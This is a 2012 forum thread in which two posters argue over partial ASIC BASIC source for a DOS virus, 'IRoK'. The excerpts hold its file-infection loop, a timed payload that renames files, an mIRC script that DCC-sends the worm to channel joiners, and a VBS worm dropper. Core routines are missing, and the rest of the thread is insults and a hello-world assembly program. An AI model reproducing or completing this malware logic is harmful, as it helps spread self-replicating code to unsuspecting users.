PC Review


Reply
Thread Tools Rate Thread

Let's walk through this virus source code, shall we?

 
 
RayLopez99
Guest
Posts: n/a
 
      27th Jul 2012
The poster that goes by "Dustin" in this group posted the below. Don't know where he got it, probably cut and paste from somewhere, but I'd thought it could be a good exercise to go through it, line by line, and figure out what it does. I would appreciate any comments, and I would cross-post this but Google Groups no longer supports that feature.

RL

(My comments in lines having REM in CAPS)


> Again, the point of my exercise is to expose your ignorance to the
> world, not mine. Show us what you got. I never said 'fully
> functional'--I even said pseudocode is oK. Like the other poster
> said, do you even read your posts?


write_file:
rem this routine will write selected bytes at whatever current position
rem from whatever buffer i choose into the file.
rem if the routine did not write all data ax will not equal cx upon
rem return from int call.
rem define dx register before calling this routine to point to the
rem memory address of the buffer area you want to write from. like so:
rem dx=varptr(buffer(0))
rem cx is how many bytes to write

REM AX, DX, CX are Intel Registers--how many such registers in the x86?--RL

if file_handle>4 then
ax=&hex4000
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
byteswritten=ax
endif
return

REM - what do the lines above do? Perhaps file_handle > 4 goes to long file names? what address is "&hex4000"? why set bx,cx to these values, and what about na? Is this a 'null' or 'zero' for remaining registers?

read_file:
rem as the name implies, it reads bytes into a buffer. :-)
rem as with write_file, you need to predefine the dx register for the
rem buffer where you want the info stored. Like so: dx=varptr(buffer(0))
rem if you don't, this routine will not work, or will overwrite some
rem other section of memory. And for virus coding, this is very bad!
rem cx register is how many bytes to read

REM the above comments makes no sense, not to mention the stupid smileys are annoying. But I don't see where the dx register was set to zero as he claims.


if file_handle>4 then
ax=&hex3f00
bx=file_handle
cx=bytesize
int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
bytesread=ax
endif
return

REM same as before, why? Why is file_handle not < 4? why this cutoff? Perhaps very long file names are not supported by this program?

actual_virus_replication_start:
rem The actual code responsible for replication control has
rem moved down here. It's a new technique of coding that I intend
rem for my future viruses to use.
rem used to be called start_virus:
Rem this is the central virus infection code.
rem We will search for a maximum of 10 files per run.
errcode=0
attr=6
kewl=0
virii=7

REM What are these parameters 'errcode' 'attr' why set to 6? etc

CALL SUB "FindFirstF" proc$ Attr ErrCode
REM what is proc$ ? what is this line for?

WHILE ErrCode = 0
CALL SUB "GetNameF" FileName$
filename$=virupath$+filename$
if sleepy=0 then
gosub infect_check:
if infected=0 then
gosub lets_infect:
endif
else
errcode=1
endif
CALL SUB "FindNextF" ErrCode
if kewl=virii then
errcode=1
endif
WEND

REM seems I understand what is going on at a conceptual level but without the SUB functions not 100% clear. Need the gosub 'lets_infect'

return

rem ***BEGIN PAYLOAD(S) CODE
payload:
clear_to_run=1
if hre$>"20" then

REM what is the above line doing?

rem Executables remain offline for the remainder of the evening.
clear_to_run=0
endif


if min$="17" then


rem We're fixing to hose this dudes drive. Well, not really.

REM typical stupid self-aggrandizing comment. Imagine--this guy is writingthis for a future audience. Ironically, now that he has an audience (if in fact our Dustin is the real author) he will not or cannot explain his code. Wow, that speaks volumes. Either incompetence / fakery, excessive misplaced paranoia about the law and how it operates (and he's already in deep water, for reasons he does not even understand), or just playing drama games for his clueless kiddie script non-programmer followers


rem We're renaming all files/directorys from current\root to
rem high ascii characters. The user doesn't actually lose anything,
rem he just (average user) doesn't know what to do at this point. ;p
rem this takes a second or two, so We're going to display some
rem text to keep the user busy.
cls
print"Some say the end is near. Some say we'll see Armageddon"
print"soon. I certainly hope we will. The only way to fix it is"
print"to flush it all away. Any ****ing joint, any ****in Day."
print""
print"**** all these gun toting hip gangster wannabes. **** your"
print"tattoes, **** all you junkies and your short memory. I'm"
print"praying for rain, I'm prayin for tidal waves. I wanna see"
print"the ground give way. I wanna watch it all go down. Mah"
print"please flush it all away, I wanna see it go riding down. I"
print"wanna see it go riding. Watch you flush it all away."
print""
print"Where do bad folks go when they die? They don't goto heaven"
print"where the angels fly. They goto a lake of fire and fry. See"
print"em again till the 4th of July. People cry and people moan."
print"look for a dry place to call their own, look for a dry place"
print"to rest there bones."
print""
gosub whack_a_system:
print"Thanks for reading the text above, I've had enough time to"
print"remove the contents of your hard disk for you. :-)"
gosub keypress:

if min$="21" then
print"ΕΎ IRoK v1.1 - RaiD/SLAM[2000]"
gosub keypress:
call sub "Stars"
return
endif

REM what is the above? Perhaps to display something in stdout, the console? Is this a console mode MS-DOS virus?



rem End of payload jumpsystem!

mirc_drop:
filename$=drive$
filename$=filename$+"mirc\irok.exe"
script$=drive$
script$=script$+"mirc\script.ini"
gosub raidyworm:
rem Worm copy dumped
rem raidyworm returns filename$ that you sent.


REM need subs--that's where the action is...Dustin did not provide. Scared again it seems.

tempfile$=filename$
filename$=script$
gosub set_attr:
filename$=tempfile$
rem drop script
open"o",2,script$
sensitivemsg=1
msg$="[script]|n0=on 1:JOIN:#:{|n1=if ($nick != $me) {|"
gosub dump_msg:
msg$="n2= /dcc send $nick "
msg$=msg$+filename$
msg$=msg$+"|"
gosub dump_msg:
msg$="n3= }|n4=}|n5=on 1:TEXT:irok:#:/amsg My computer is 0wned byIRoK
v1.1|"
gosub dump_msg:
close 2
return

vbsdrop:
rem we have to drop a piece of VBS material. We have an external routine
rem which handles this. We need only create the worm file, and then
rem call the routine. However, before we do this, We check to see if
we've
rem done this before. If so, we don't ever do it again. Well, unless the
rem user deletes our marker.
vbsdrop=0
open"i",2,"c:\windows\system\winrde.dll"
if error>0 then
rem we haven't done this, ok kewl.
vbsdrop=1
endif
close 2
if vbsdrop=1 then
tempname$=filename$
filename$="c:\windows\system\irok.exe"
gosub raidyworm:
rem Ok, worms dropped.
filename$=tempname$
call sub "vbsroutine"
rem Now create marker.
open"o",2,"c:\windows\system\winrde.dll"
for x=1 to 8095
print #2,x
next x
close 2
endif
return

whack_a_system:
rem Simple routine. One line. ;p
call sub "drago"
return

raidyworm:
rem worm dump
rem specify filename to dump too in filename$
newattr=0
gosub set_attr:
gosub create_file:
tempsize=virus_size
tempsize=tempsize+1
bytesize=tempsize
dx=varptr(virus_data(0))
gosub write_file:
gosub close_file:
rem One worm to order.
return

rem ***--> End of Payload section.

> Commented enough for you Ray?


> That's not psuedo code either. thats verbatim irok source code.


It's missing stuff. See the above and comment.

> if she even knows you. And non-programmers like the kiddie scripters
> you so despise. Dream on. You are nothing.


RL

PS--I challenge Dustin to show his 'mastery' of assembly by simply posting here a simple subroutine in assembly that will display "FSCK YOU" on the screen if a user runs the program. Simple enough, but if Dustin is a cut-and-paste kiddie scripter as I suspect he is, he won't find this on the net and will fail this simple test.

 
Reply With Quote
 
 
 
 
Dustin
Guest
Posts: n/a
 
      28th Jul 2012
RayLopez99 <(E-Mail Removed)> wrote in
news:(E-Mail Removed):

> The poster that goes by "Dustin" in this group posted the below.
> Don't know where he got it, probably cut and paste from somewhere,
> but I'd thought it could be a good exercise to go through it, line by
> line, and figure out what it does. I would appreciate any comments,
> and I would cross-post this but Google Groups no longer supports that
> feature.
>
> RL
>
> (My comments in lines having REM in CAPS)
>
>
>> Again, the point of my exercise is to expose your ignorance to the
>> world, not mine. Show us what you got. I never said 'fully
>> functional'--I even said pseudocode is oK. Like the other poster
>> said, do you even read your posts?

>
> write_file:
> rem this routine will write selected bytes at whatever current
> position rem from whatever buffer i choose into the file.
> rem if the routine did not write all data ax will not equal cx upon
> rem return from int call.
> rem define dx register before calling this routine to point to the
> rem memory address of the buffer area you want to write from. like
> so: rem dx=varptr(buffer(0))
> rem cx is how many bytes to write
>
> REM AX, DX, CX are Intel Registers--how many such registers in the
> x86?--RL


I see you can use google. You've demonstrated google ability here, not
that you understand what I'm doing.

> if file_handle>4 then
> ax=&hex4000
> bx=file_handle
> cx=bytesize
> int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
> byteswritten=ax
> endif
> return
>
> REM - what do the lines above do? Perhaps file_handle > 4 goes to
> long file names? what address is "&hex4000"? why set bx,cx to these
> values, and what about na? Is this a 'null' or 'zero' for remaining
> registers?


As I said, you googled for the information you provided above. You could
google for this too. Long filenames? Via file handle? Er, no.

> read_file:
> rem as the name implies, it reads bytes into a buffer. :-)
> rem as with write_file, you need to predefine the dx register for the
> rem buffer where you want the info stored. Like so:
> dx=varptr(buffer(0)) rem if you don't, this routine will not work, or
> will overwrite some rem other section of memory. And for virus
> coding, this is very bad! rem cx register is how many bytes to
> read
>
> REM the above comments makes no sense, not to mention the stupid
> smileys are annoying. But I don't see where the dx register was set
> to zero as he claims.


it's not set to zero. buffer(0) is a reference point. it's an array,
Ray! First element.

>
> if file_handle>4 then
> ax=&hex3f00
> bx=file_handle
> cx=bytesize
> int86(&hex21,ax,bx,cx,dx,na,na,na,na,na)
> bytesread=ax
> endif
> return
>
> REM same as before, why? Why is file_handle not < 4? why this
> cutoff? Perhaps very long file names are not supported by this
> program?


Some programmer you are...

> REM What are these parameters 'errcode' 'attr' why set to 6? etc


I didn't think you'd be able to follow along... Even with commented
code, in asic of all things.. Cripes.

> CALL SUB "FindFirstF" proc$ Attr ErrCode
> REM what is proc$ ? what is this line for?


Damnit Ray. What good would it do me to post pure asm, or pseudo code as
you said? You can't even follow asic!

> WHILE ErrCode = 0
> CALL SUB "GetNameF" FileName$
> filename$=virupath$+filename$
> if sleepy=0 then
> gosub infect_check:
> if infected=0 then
> gosub lets_infect:
> endif
> else
> errcode=1
> endif
> CALL SUB "FindNextF" ErrCode
> if kewl=virii then
> errcode=1
> endif
> WEND
>
> REM seems I understand what is going on at a conceptual level but
> without the SUB functions not 100% clear. Need the gosub
> 'lets_infect'


No you don't. Really, you don't need that. Between the two source
snippits posted since yesterday, had you really been a programmer; you'd
already know what it's doing, AND how.


> return
>
> rem ***BEGIN PAYLOAD(S) CODE
> payload:
> clear_to_run=1
> if hre$>"20" then
>
> REM what is the above line doing?


It's checking a variable in military time. If it's after 8pm, your
original program will not run. Just irok. It's put your infected
applications to sleep; and this is how it checks the time.

> rem Executables remain offline for the remainder of the evening.
> clear_to_run=0
> endif
>
>
> if min$="17" then
>
>
> rem We're fixing to hose this dudes drive. Well, not really.
>
> REM typical stupid self-aggrandizing comment. Imagine--this guy is
> writing this for a future audience. Ironically, now that he has an
> audience (if in fact our Dustin is the real author) he will not or
> cannot explain his code. Wow, that speaks volumes. Either
> incompetence / fakery, excessive misplaced paranoia about the law and
> how it operates (and he's already in deep water, for reasons he does
> not even understand), or just playing drama games for his clueless
> kiddie script non-programmer followers


I shouldn't have to explain this code. It's very simple. It wasn't
intended for an audience Ray. Your looking at 12 year old source code.

> REM what is the above? Perhaps to display something in stdout, the
> console? Is this a console mode MS-DOS virus?


Didn't you read it's long description at the url posted? It's a DOS
based virus, Yes. You can't pipe it to stdout; I used asics internal
print routines instead of my faster asm ones which supported piping.

It'll display in console, and only in console.

>
>
> rem End of payload jumpsystem!
>
> mirc_drop:
> filename$=drive$
> filename$=filename$+"mirc\irok.exe"
> script$=drive$
> script$=script$+"mirc\script.ini"
> gosub raidyworm:
> rem Worm copy dumped
> rem raidyworm returns filename$ that you sent.
>
>
> REM need subs--that's where the action is...Dustin did not provide.
> Scared again it seems.


The action is in the subroutines. Yes, everything else sets it up for
subroutines. Any decent coder will not rehash the same code, he'll use
routines multiple times instead.

Not scared of anything, just not going to help you write a virus to
cause mischief. Besides, I remember your question about routing and how
how dissed me after I provided the information you requested.

You don't really need the missing subroutines if you were half the
programmer, or sorry, coder you said you were. The code I've posted is
enough to get the idea and concept.

> It's missing stuff. See the above and comment.


I told you from the getgo it would be. I won't provide you complete
source to irok, and you can't find it online either. I never released
it. [g]

> PS--I challenge Dustin to show his 'mastery' of assembly by simply
> posting here a simple subroutine in assembly that will display "FSCK
> YOU" on the screen if a user runs the program. Simple enough, but if
> Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
> won't find this on the net and will fail this simple test.


Okay. Assembler you want, assembler you get.
Assemble using nasm. Tasm should work, but it was written in and for
nasm.

This is my hello world in nasm...

assemble it, and run.

segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

 
Reply With Quote
 
 
 
 
Dustin
Guest
Posts: n/a
 
      28th Jul 2012
Dustin <(E-Mail Removed)> wrote in
news:XnsA09DC95497914HHI2948AJD832@no:

> Okay. Assembler you want, assembler you get.
> Assemble using nasm. Tasm should work, but it was written in and for
> nasm.


Written in=qedit, saved as ascii text and fed to nasm via cli. [g] Just
in case Ant wants to be anal with me on this. [eg]

> This is my hello world in nasm...
>
> assemble it, and run.
>
> segment code
>
> start:
> mov ax,data
> mov ds,ax
> mov ax,stack
> mov ss,ax
> mov sp,stacktop
>
> mov dx,hello
> mov ah,9
> int 0x21
>
> mov ax,0x4c00
> int 0x21
>
> segment data
>
> hello: db 'hello, ****ing, world',13,10,'$'
>
> segment stack stack
> resb 64
> stacktop:


Nothing special, not commented as well, it shouldn't need to be Ray!

Oh, and just so you know, this is assembler basics 101; it can be found
online in many different styles. Theres several ways to write this to do
the same thing. My code could even be made smaller by removing a few
things you don't actually need.

You can't get any lower bytewise than assembler or outright machine
language. Not even C can make a binary smaller. [g]


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

 
Reply With Quote
 
Dustin
Guest
Posts: n/a
 
      28th Jul 2012
RayLopez99 <(E-Mail Removed)> wrote in
news:(E-Mail Removed):

> PS--I challenge Dustin to show his 'mastery' of assembly by simply
> posting here a simple subroutine in assembly that will display "FSCK
> YOU" on the screen if a user runs the program. Simple enough, but if
> Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
> won't find this on the net and will fail this simple test.


segment code

start:
mov ax,data
mov ds,ax
mov ax,stack
mov ss,ax
mov sp,stacktop

mov dx,hello
mov ah,9
int 0x21

mov ax,0x4c00
int 0x21

segment data

hello: db 'hello, ****ing, world',13,10,'$'

segment stack stack
resb 64
stacktop:


Lemme know if you need it explained line by line too. [g]
you can find nasm online for free.

Now then...

Unless you can eat some crow like a good man, and show some respect; I'm
about done explaining old ass technology and ways of doing things. Your
challenges are boring the **** out of me, too. You've stated you have a
book on viruses.. Have you opened the damn thing?






--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

 
Reply With Quote
 
Dustin
Guest
Posts: n/a
 
      28th Jul 2012
Dustin <(E-Mail Removed)> wrote in
news:XnsA09DCAB6F6864HHI2948AJD832@no:

> segment code
>
> start:
> mov ax,data
> mov ds,ax
> mov ax,stack
> mov ss,ax
> mov sp,stacktop
>
> mov dx,hello
> mov ah,9
> int 0x21
>
> mov ax,0x4c00
> int 0x21
>
> segment data
>
> hello: db 'hello, ****ing, world',13,10,'$'
>
> segment stack stack
> resb 64
> stacktop:


Which turns into :

Volume in drive C has no label.
Volume Serial Number is B051-3A91

Directory of C:\Program Files\nasm

03/15/1997 09:21 PM 259 hello.asm
03/15/1997 02:15 PM 561 HELLO.EXE
03/15/1997 02:15 PM 196 hello.obj
3 File(s) 1,016 bytes
0 Dir(s) 27,684,458,496 bytes free

Hmm. I'm running low on drive space...

See how old that code is too Ray? [g] Older than irok. hehehe.

Punkass.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

 
Reply With Quote
 
G. Morgan
Guest
Posts: n/a
 
      28th Jul 2012
Dustin wrote:

>segment code
>
>start:
>mov ax,data
>mov ds,ax
>mov ax,stack
>mov ss,ax
>mov sp,stacktop
>
>mov dx,hello
>mov ah,9
>int 0x21
>
>mov ax,0x4c00
>int 0x21
>
>segment data
>
>hello: db 'hello, ****ing, world',13,10,'$'
>
>segment stack stack
>resb 64
>stacktop:
>
>
>Lemme know if you need it explained line by line too. [g]
>you can find nasm online for free.


How do I manually assemble it with 'debug'?

 
Reply With Quote
 
Dustin
Guest
Posts: n/a
 
      28th Jul 2012
G. Morgan <(E-Mail Removed)> wrote in
news:(E-Mail Removed):

> Dustin wrote:
>
>>segment code
>>
>>start:
>>mov ax,data
>>mov ds,ax
>>mov ax,stack
>>mov ss,ax
>>mov sp,stacktop
>>
>>mov dx,hello
>>mov ah,9
>>int 0x21
>>
>>mov ax,0x4c00
>>int 0x21
>>
>>segment data
>>
>>hello: db 'hello, ****ing, world',13,10,'$'
>>
>>segment stack stack
>>resb 64
>>stacktop:
>>
>>
>>Lemme know if you need it explained line by line too. [g]
>>you can find nasm online for free.

>
> How do I manually assemble it with 'debug'?
>
>


sigh

convert my 0x to 21h and type each line one at a time...
would just be easier if you assembled it with nasm...
debug is a pain in the ass.



--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

 
Reply With Quote
 
Dustin
Guest
Posts: n/a
 
      28th Jul 2012
Dustin <(E-Mail Removed)> wrote in
news:XnsA09DDA353D740HHI2948AJD832@no:

> G. Morgan <(E-Mail Removed)> wrote in
> news:(E-Mail Removed):
>
>> Dustin wrote:
>>
>>>segment code
>>>
>>>start:
>>>mov ax,data
>>>mov ds,ax
>>>mov ax,stack
>>>mov ss,ax
>>>mov sp,stacktop
>>>
>>>mov dx,hello
>>>mov ah,9
>>>int 0x21
>>>
>>>mov ax,0x4c00
>>>int 0x21
>>>
>>>segment data
>>>
>>>hello: db 'hello, ****ing, world',13,10,'$'
>>>
>>>segment stack stack
>>>resb 64
>>>stacktop:
>>>
>>>
>>>Lemme know if you need it explained line by line too. [g]
>>>you can find nasm online for free.

>>
>> How do I manually assemble it with 'debug'?
>>
>>

>
> sigh
>
> convert my 0x to 21h and type each line one at a time...
> would just be easier if you assembled it with nasm...
> debug is a pain in the ass.
>
>
>


I'm assuming you know how to enter assemble mode here with debug,
morgan. If you're being cheeky with me, I won't offer any more help


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the
way. I ain't got much time. Young ones close behind. I can't wait in
line.

 
Reply With Quote
 
Buffalo
Guest
Posts: n/a
 
      28th Jul 2012

"RayLopez99" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
The poster that goes by "Dustin" in this group posted the below. Don't know
where he got it, probably cut and paste from somewhere, but I'd thought it
could be a good exercise to go through it, line by line, and figure out what
it does. I would appreciate any comments, and I would cross-post this but
Google Groups no longer supports that feature.

RL
Teenage jerk-off!!
Buffalo


 
Reply With Quote
 
Dustin
Guest
Posts: n/a
 
      28th Jul 2012
"Buffalo" <(E-Mail Removed)> wrote in
news:juvfq2$hta$(E-Mail Removed):

> "RayLopez99" <(E-Mail Removed)> wrote in message
> news:(E-Mail Removed)...
> The poster that goes by "Dustin" in this group posted the below.
> Don't know where he got it, probably cut and paste from somewhere,
> but I'd thought it could be a good exercise to go through it, line by
> line, and figure out what it does. I would appreciate any comments,
> and I would cross-post this but Google Groups no longer supports that
> feature.
>
> RL
> Teenage jerk-off!!
> Buffalo
>
>
>


hehehe.. I'm starting to wonder about Rays age myself.. No experience with
older languages, inability to understand a very simple language...

and he keeps telling me i'm in my 60s.


--
Things look bad from over here. Too much confusion and no solution.
Everyone here knows your fear. Your out of touch and you try too much.
Yesterdays glory will help us today. You wanna retire? Get outta the way.
I ain't got much time. Young ones close behind. I can't wait in line.

 
Reply With Quote
 
 
 
Reply

Thread Tools
Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Re: Use this important VIRUS ALERT - VIRUS ALERT - W32.Swen.A@mm Worm - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT nemo Microsoft VC .NET 0 3rd Nov 2003 09:34 PM
Re: See update - VIRUS ALERT - VIRUS ALERT - W32.Swen.A@mm Worm - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT nemo Microsoft Dot NET Framework 0 12th Oct 2003 01:29 PM
Re: See update - VIRUS ALERT - VIRUS ALERT - W32.Swen.A@mm Worm - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT nemo Microsoft Outlook Contacts 0 12th Oct 2003 01:29 PM
Re: See update - VIRUS ALERT - VIRUS ALERT - W32.Swen.A@mm Worm - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT nemo Windows XP Print / Fax 0 12th Oct 2003 01:29 PM
Re: See update - VIRUS ALERT - VIRUS ALERT - W32.Swen.A@mm Worm - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT - VIRUS ALERT nemo Windows XP Photos 0 12th Oct 2003 01:29 PM


Features
 

Advertising
 

Newsgroups
 


All times are GMT +1. The time now is 07:10 PM.